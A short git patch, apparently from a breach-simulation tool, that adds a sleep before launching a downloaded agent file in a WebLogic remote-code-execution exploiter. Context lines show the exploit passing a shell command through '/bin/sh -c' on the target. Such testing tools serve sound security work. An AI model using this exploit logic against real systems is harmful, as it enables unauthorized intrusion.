From 06182a485a15e798fefb9d1df685bb807d084caf Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 25 Sep 2019 15:42:24 +0300 Subject: [PATCH] Added delay in weblogic to make exploiter more reliable --- monkey/infection_monkey/exploit/weblogic.py | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py index af3fc7abd..e1ceb29fd 100644 --- a/monkey/infection_monkey/exploit/weblogic.py +++ b/monkey/infection_monkey/exploit/weblogic.py @@ -252,6 +252,7 @@ class WebLogic201710271(WebRCE): # https://github.com/rapid7/metasploit-framework/pull/11780 class WebLogic20192725(WebRCE): URLS = ["_async/AsyncResponseServiceHttps"] + DELAY_BEFORE_EXPLOITING_SECONDS = 5 _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE @@ -266,6 +267,11 @@ class WebLogic20192725(WebRCE): exploit_config['dropper'] = True return exploit_config + def execute_remote_monkey(self, url, path, dropper=False): + # Without delay exploiter tries to launch monkey file that is still finishing up after downloading. + time.sleep(WebLogic20192725.DELAY_BEFORE_EXPLOITING_SECONDS) + super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper) + def exploit(self, url, command): if 'linux' in self.host.os['type']: payload = self.get_exploit_payload('/bin/sh', '-c', command)